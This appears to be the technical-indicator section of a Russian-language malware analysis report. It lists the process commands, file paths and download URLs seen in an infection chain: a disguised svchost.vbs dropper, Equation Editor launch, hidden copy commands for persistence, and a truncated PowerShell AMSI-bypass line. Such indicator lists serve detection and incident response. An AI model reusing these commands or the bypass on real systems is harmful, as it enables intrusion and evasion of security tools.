Техническая информация
- '%WINDIR%\syswow64\wscript.exe' "C:\Users\Public\svchost.vbs"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like '*iUtils') {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like '*Context') {$f=$e}};$g=$f.GetValu...
- %WINDIR%\microsoft.net\framework\v4.0.30319\msbuild.exe
- C:\users\public\svchost.vbs
- %LOCALAPPDATA%\microsoft\windows\caches\svchost.vbs
- '18.##9.128.212':80
- http://18.##9.128.212/n/new.vbs
- http://18.##9.128.212/p/Payload.jpg
- '<SYSTEM32>\cmd.exe' /c cOpY "C:\Users\Public\svchost.vbs" "%LOCALAPPDATA%\Microsoft\Windows\Caches" /Y' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like '*iUtils') {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like '*Context') {$f=$e}};$g=$f.GetValu...' (со скрытым окном)
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '<SYSTEM32>\cmd.exe' /c cOpY "C:\Users\Public\svchost.vbs" "%LOCALAPPDATA%\Microsoft\Windows\Caches" /Y